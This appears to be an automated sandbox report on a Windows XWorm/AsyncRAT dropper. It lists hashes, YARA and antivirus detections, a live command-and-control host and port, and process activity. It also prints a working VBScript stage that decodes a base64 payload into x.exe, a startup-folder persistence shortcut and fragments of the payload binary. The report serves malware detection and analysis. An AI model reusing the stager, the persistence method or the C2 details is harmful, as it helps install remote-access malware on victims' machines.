                                          Preview:TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g..aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAI7a9GUAAAAAAAAAAOAAAgELAQsAAA..wBAAAoAgAAAAAAfioBAAAgAAAAQAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACg..AwAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAACQqAQBXAA..AAAEABAF4kAgAAAAAAAAAAAAAAAAAAAAAAAIADAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAA..AAAAAAAAAAAC50ZXh0AAAAhAoBAAAgAAAADAEAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNy..YwAAAF4kAgAAQAEAACYCAAAOAQAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAIADAA..ACAAAANAMAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABgKgEAAAAAAEgAAAAC..AAUAdF4AALDLAAABAAAAJgAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAB4CKBgAAAoqGnIBAABwKhogrnOvAioeAigZAAAKKhpyJQAAcCoa..IM063wMqpnMaAAAKgAEAAARzGwAACoACAAAEcxwAAAqAAwAABHMdAAAKgAQAAAQqGnJJAA..BwKhogE/UeBCoacm0AAHAqGiCwOEYDKhpykQAAcCoaIG3UYAIqGnK1AABwKhogIB

                                          C:\Users\user\AppData\Local\Temp\x.exe

                                          Download File
                                          Process:C:\Windows\System32\cscript.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):210432
                                          Entropy (8bit):5.829643716053016
                                          Encrypted:false
                                          SSDEEP:3072:prm4sOjb48smI2WjbeYpX6Ou7atBBZ4uzDSEG2dCBVDtM5:pLsDbDpXKkZ4mSB2dCju
                                          MD5:74D8F5A1E068A454FFAA5C8FD32A3E44
                                          SHA1:46599D94EDC83E67E6BDE3579F61028E2BEE7096
                                          SHA-256:59B203FCF387BFDE09A17D954C9281F5743B0D0EDB9C8D1FC481EB0165416FD0
                                          SHA-512:6D5E8AEB8A5139F31B0F8ED55655C0EB52B3E2589CF1E6EE3C13B06394CEBA72DA0DC5E01972386BD75B01D17C16E00D50FE2C1E3A2C4B2A5A6B70B0A753EC3D
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security
                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 74%
                                          • Antivirus: Virustotal, Detection: 77%, Browse
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e.....................(......~*... ...@....@.. ....................................@.................................$*..W....@..^$........................................................................... ............... ..H............text........ ...................... ..`.rsrc...^$...@...&..................@..@.reloc...............4..............@..B................`*......H.......t^..........&.....................................................(....*.r...p*. .s..*..(....*.r%..p*. .:..*.s.........s.........s.........s.........*.rI..p*. ....*.rm..p*. .8F.*.r...p*. m.`.*.r...p*. .p.*.r...p*. S...*..((...*.r...p*. .b..*.r3..p*. r...*.(*...-.(+...,.+.(,...,.+.()...,.+.((...,..(H...*"(....+.*&(....&+.*.+5sZ... .... .'..o[...(*...~....-.(\...(N...~....o\...&.-.*.r-..p*. *p{.*.rQ..p*. ~.H.*.r...p*. MX%.*.r...p*. .x!.*.r...p*. E/..*.r...p*. 4.R.*.rO.

                                          C:\Users\user\AppData\Local\Temp\x.vbs

                                          Download File
                                          Process:C:\Windows\System32\cmd.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:modified
                                          Size (bytes):380
                                          Entropy (8bit):5.126074554208653
                                          Encrypted:false
                                          SSDEEP:6:jpz7yVHPxORKm6JgCPmu7jjs9lVHEr6Jxlw6mvHFAF1GjyH4BZIkv:NZOmG7jU2r6JAiTrYZnv
                                          MD5:EC9A2FB69A379D913A4E0A953CD3B97C
                                          SHA1:A0303ED9F787C042071A1286BBA43A5BBDD0679E
                                          SHA-256:CF8268D158BB819EF158FF6CCBED64D5E379148A0ADB1F73A082A01D56D0286B
                                          SHA-512:FEF8E24A680991046BD7DACD6079C7E48C3031FE46CAAE722EA93797EE16C052073BA97959E992EA71AC7AB72FBCEDAA5CF4A410657AAC4C10AD24DE6935E9D6
                                          Malicious:true
                                          Preview:Set f=CreateObject("Scripting.FileSystemObject")'v..Set p=f.GetSpecialFolder(2)'v..Set i=f.OpenTextFile(p+"\x",1)'v..c=i.ReadAll()'v..i.Close'v..Set x=CreateObject("Msxml2.DOMDocument")'v..Set o=x.CreateElement("base64")'v..o.dataType="bin.base64"'v..o.text=c'v..Set b=CreateObject("ADODB.Stream")'v..b.Type=1'v..b.Open'v..b.Write o.NodeTypedValue'v..b.SaveToFile p+"\x.exe",2'v..

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hoodbyunlock.lnk

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\x.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Sep 5 08:15:11 2024, mtime=Thu Sep 5 08:15:11 2024, atime=Thu Sep 5 08:15:11 2024, length=210432, window=hide
                                          Category:dropped
                                          Size (bytes):690
                                          Entropy (8bit):4.650657845385358
                                          Encrypted:false
                                          SSDEEP:12:829Y9M/CIcPUgceGQ0zKidezvjAuVvIRgbKpE85mV:829Y9M/Nf1KiWAuUUqpm
                                          MD5:E93EE9204F19965D23C3FDA2DA7E2181
                                          SHA1:4A3A42EECB2378BEFB74F6F6ACC4CDCC8BF064D6
                                          SHA-256:080149A6F31CA8CDD485F695CEDADFB728F2B290694871842D28A0934FFEAF4B
                                          SHA-512:EE2A6088E2C103CC9684A2A7C2AD78EB317999F69B2ABC7FE9DD36C96C4B2CC696A5F9FA46B7969E3A93DA09BE3BDB302177832338F038764115FFC2F9E34FEB
                                          Malicious:false
                                          Preview:L..................F.... ...b>.t....b>.t....b>.t....6...........................P.O. .:i.....+00.../C:\...................`.1.....%Y.I. PROGRA~3..H......O.I%Y.I....g.....................g...P.r.o.g.r.a.m.D.a.t.a.....n.2..6..%Y.I HOODBY~1.EXE..R......%Y.I%Y.I...........................-=.H.o.o.d.b.y.u.n.l.o.c.k...e.x.e.......N...............-.......M....................C:\ProgramData\Hoodbyunlock.exe..7.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.H.o.o.d.b.y.u.n.l.o.c.k...e.x.e.`.......X.......216041...........hT..CrF.f4... ..2=.b...,...W..hT..CrF.f4... ..2=.b...,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                          C:\Windows\appcompat\Programs\Amcache.hve

                                          Download File
                                          Process:C:\Windows\System32\WerFault.exe
                                          File Type:MS Windows registry file, NT/2000 or above
                                          Category:dropped
                                          Size (bytes):1835008
                                          Entropy (8bit):4.421689824762361
                                          Encrypted:false
                                          SSDEEP:6144:QSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNh0uhiTwP:7vloTMW+EZMM6DFy/03wP
                                          MD5:F4F6659097B9B81D5C4151DD07A659E7
                                          SHA1:4C8965ADD732BFFD2C11C41899FB008F10DFD9F0
                                          SHA-256:5C184AA9CC72491CE3E869A819D3BB6003A27BC03C14EFCB599B2FA02E0C7C49
                                          SHA-512:F5DF103C11DDD60AF0D6A89089D17E6F0DCF69DB170A037ACDFF0A3E140A3D3C00D0FA21D3C6C75F13D00C291E37FA435B567AAB79590618AD9247E6E1B6C09E
                                          Malicious:false
                                          Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmvr.Nt................................................................................................................................................................................................................................................................................................................................................G.z........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          Static File Info

                                          General

                                          File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):3.792773169116553
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:x.exe
                                          File size:695'808 bytes
                                          MD5:98a2d7aee74efe11a83e1514199a1346
                                          SHA1:758365522b6a9eebe7ec5a10f4f260d3ffcd285a
                                          SHA256:0e079477b2c5072f876fabdd5339ce96ed42a55361fb445d1c9bbe1282bf4850
                                          SHA512:3f0c83af88c1f2b067ad56d458719cc1641a6aa672eea68adb0adc6dd25f7306dc9b8e018021828f61d514d74437683671e23e9eb731d865007335ec403722b5
                                          SSDEEP:3072:gti/b34bfUYCZS6jBPbZ8L2SdoYBUBk1pfApjgrD1xJiS+F4Hsi2I/7X88eXrspS:P3ZS6jBPl8LDdSqIw
                                          TLSH:6AE4D22178EF6908E3117ADFABD4B4AF496DE56B193974BC3071C30A6247C038CA577A
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(..f............................>.... ........@.. ....................................@................................

                                          File Icon

                                          Icon Hash:00928e8e8686b000

                                          Static PE Info

                                          General

                                          Entrypoint:0x4ab33e
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows cui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x6604A528 [Wed Mar 27 23:00:56 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xab2f00x4b.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xac0000x4d8.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xae0000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000xa93440xa9400a167d747e37c506f8d5a9cd6203f3465False0.2139941262001477data3.7915981418888647IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0xac0000x4d80x600f3cc4607c743900cdd6d8ed9b925f2f9False0.3723958333333333data3.701694837196674IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0xae0000xc0x2008cc41125a56b2c09042334c7b8e63b2dFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_VERSION0xac0a00x244data0.4603448275862069
                                          RT_MANIFEST0xac2e80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-09-05T11:15:25.670475+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.549722147.185.221.1736301TCP

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 5, 2024 11:15:11.360744953 CEST4972080192.168.2.5208.95.112.1
                                          Sep 5, 2024 11:15:11.367610931 CEST8049720208.95.112.1192.168.2.5
                                          Sep 5, 2024 11:15:11.367744923 CEST4972080192.168.2.5208.95.112.1
                                          Sep 5, 2024 11:15:11.368690968 CEST4972080192.168.2.5208.95.112.1
                                          Sep 5, 2024 11:15:11.374847889 CEST8049720208.95.112.1192.168.2.5
                                          Sep 5, 2024 11:15:11.835160017 CEST8049720208.95.112.1192.168.2.5
                                          Sep 5, 2024 11:15:11.884211063 CEST4972080192.168.2.5208.95.112.1
                                          Sep 5, 2024 11:15:15.310756922 CEST4972236301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:15:15.315581083 CEST3630149722147.185.221.17192.168.2.5
                                          Sep 5, 2024 11:15:15.315658092 CEST4972236301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:15:15.379422903 CEST4972236301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:15:15.385365963 CEST3630149722147.185.221.17192.168.2.5
                                          Sep 5, 2024 11:15:25.670475006 CEST4972236301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:15:25.675324917 CEST3630149722147.185.221.17192.168.2.5
                                          Sep 5, 2024 11:15:35.915802002 CEST4972236301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:15:35.920835972 CEST3630149722147.185.221.17192.168.2.5
                                          Sep 5, 2024 11:15:36.694504023 CEST3630149722147.185.221.17192.168.2.5
                                          Sep 5, 2024 11:15:36.694724083 CEST4972236301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:15:39.540582895 CEST4972236301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:15:39.545540094 CEST3630149722147.185.221.17192.168.2.5
                                          Sep 5, 2024 11:15:41.698240042 CEST4972736301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:15:41.703244925 CEST3630149727147.185.221.17192.168.2.5
                                          Sep 5, 2024 11:15:41.707319975 CEST4972736301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:15:41.747956991 CEST4972736301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:15:41.753640890 CEST3630149727147.185.221.17192.168.2.5
                                          Sep 5, 2024 11:15:52.415774107 CEST4972736301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:15:52.420690060 CEST3630149727147.185.221.17192.168.2.5
                                          Sep 5, 2024 11:15:53.359147072 CEST8049720208.95.112.1192.168.2.5
                                          Sep 5, 2024 11:15:53.359368086 CEST4972080192.168.2.5208.95.112.1
                                          Sep 5, 2024 11:16:03.085395098 CEST3630149727147.185.221.17192.168.2.5
                                          Sep 5, 2024 11:16:03.085580111 CEST4972736301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:16:04.712362051 CEST4972736301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:16:04.717314005 CEST3630149727147.185.221.17192.168.2.5
                                          Sep 5, 2024 11:16:06.808094978 CEST4973036301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:16:06.813039064 CEST3630149730147.185.221.17192.168.2.5
                                          Sep 5, 2024 11:16:06.813133001 CEST4973036301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:16:06.843569994 CEST4973036301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:16:06.849325895 CEST3630149730147.185.221.17192.168.2.5
                                          Sep 5, 2024 11:16:17.134391069 CEST4973036301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:16:17.140286922 CEST3630149730147.185.221.17192.168.2.5
                                          Sep 5, 2024 11:16:27.431644917 CEST4973036301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:16:27.436578035 CEST3630149730147.185.221.17192.168.2.5
                                          Sep 5, 2024 11:16:28.214593887 CEST3630149730147.185.221.17192.168.2.5
                                          Sep 5, 2024 11:16:28.214658976 CEST4973036301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:16:31.806051970 CEST4973036301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:16:31.809988022 CEST4973136301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:16:31.848332882 CEST3630149730147.185.221.17192.168.2.5
                                          Sep 5, 2024 11:16:31.848351955 CEST3630149731147.185.221.17192.168.2.5
                                          Sep 5, 2024 11:16:31.848449945 CEST4973136301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:16:32.021694899 CEST4973136301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:16:32.026544094 CEST3630149731147.185.221.17192.168.2.5
                                          Sep 5, 2024 11:16:32.670761108 CEST4973136301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:16:32.677856922 CEST3630149731147.185.221.17192.168.2.5
                                          Sep 5, 2024 11:16:34.025319099 CEST4973136301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:16:34.031172037 CEST3630149731147.185.221.17192.168.2.5
                                          Sep 5, 2024 11:16:36.009422064 CEST4973136301192.168.2.5147.185.221.17
                                          Sep 5, 2024 11:16:36.014486074 CEST3630149731147.185.221.17192.168.2.5
                                          Sep 5, 2024 11:16:44.171875000 CEST4972080192.168.2.5208.95.112.1
                                          Sep 5, 2024 11:16:44.172111034 CEST4973136301192.168.2.5147.185.221.17

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 5, 2024 11:15:11.342549086 CEST5674853192.168.2.51.1.1.1
                                          Sep 5, 2024 11:15:11.351741076 CEST53567481.1.1.1192.168.2.5
                                          Sep 5, 2024 11:15:15.276340961 CEST4924553192.168.2.51.1.1.1
                                          Sep 5, 2024 11:15:15.309273005 CEST53492451.1.1.1192.168.2.5

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Sep 5, 2024 11:15:11.342549086 CEST192.168.2.51.1.1.10x541eStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                          Sep 5, 2024 11:15:15.276340961 CEST192.168.2.51.1.1.10x98e5Standard query (0)character-acquisitions.gl.at.ply.ggA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Sep 5, 2024 11:14:55.290291071 CEST1.1.1.1192.168.2.50x7c2dNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                          Sep 5, 2024 11:14:55.290291071 CEST1.1.1.1192.168.2.50x7c2dNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                          Sep 5, 2024 11:15:11.351741076 CEST1.1.1.1192.168.2.50x541eNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                          Sep 5, 2024 11:15:15.309273005 CEST1.1.1.1192.168.2.50x98e5No error (0)character-acquisitions.gl.at.ply.gg147.185.221.17A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • ip-api.com

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.549720208.95.112.1805808C:\Users\user\AppData\Local\Temp\x.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 5, 2024 11:15:11.368690968 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                          Host: ip-api.com
                                          Connection: Keep-Alive
                                          Sep 5, 2024 11:15:11.835160017 CEST175INHTTP/1.1 200 OK
                                          Date: Thu, 05 Sep 2024 09:15:11 GMT
                                          Content-Type: text/plain; charset=utf-8
                                          Content-Length: 6
                                          Access-Control-Allow-Origin: *
                                          X-Ttl: 60
                                          X-Rl: 44
                                          Data Raw: 66 61 6c 73 65 0a
                                          Data Ascii: false


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:05:14:59
                                          Start date:05/09/2024
                                          Path:C:\Users\user\Desktop\x.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\Desktop\x.exe"
                                          Imagebase:0xd00000
                                          File size:695'808 bytes
                                          MD5 hash:98A2D7AEE74EFE11A83E1514199A1346
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:1
                                          Start time:05:14:59
                                          Start date:05/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:05:14:59
                                          Start date:05/09/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat" "
                                          Imagebase:0x7ff7611b0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:4
                                          Start time:05:14:59
                                          Start date:05/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:5
                                          Start time:05:15:05
                                          Start date:05/09/2024
                                          Path:C:\Windows\System32\findstr.exe
                                          Wow64 process (32bit):false
                                          Commandline:findstr /e "'v" "C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat"
                                          Imagebase:0x7ff633140000
                                          File size:36'352 bytes
                                          MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          General

                                          Target ID:6
                                          Start time:05:15:05
                                          Start date:05/09/2024
                                          Path:C:\Windows\System32\cscript.exe
                                          Wow64 process (32bit):false
                                          Commandline:cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs
                                          Imagebase:0x7ff786ad0000
                                          File size:161'280 bytes
                                          MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000003.2146063182.000002A3F8E09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000003.2146063182.000002A3F8E09000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000003.2147613945.000002A3F936B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000003.2147613945.000002A3F936B000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000003.2145964652.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000003.2145964652.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000003.2145895375.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000003.2145895375.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000003.2145801874.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000003.2145801874.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000003.2145771458.000002A3F8DD7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
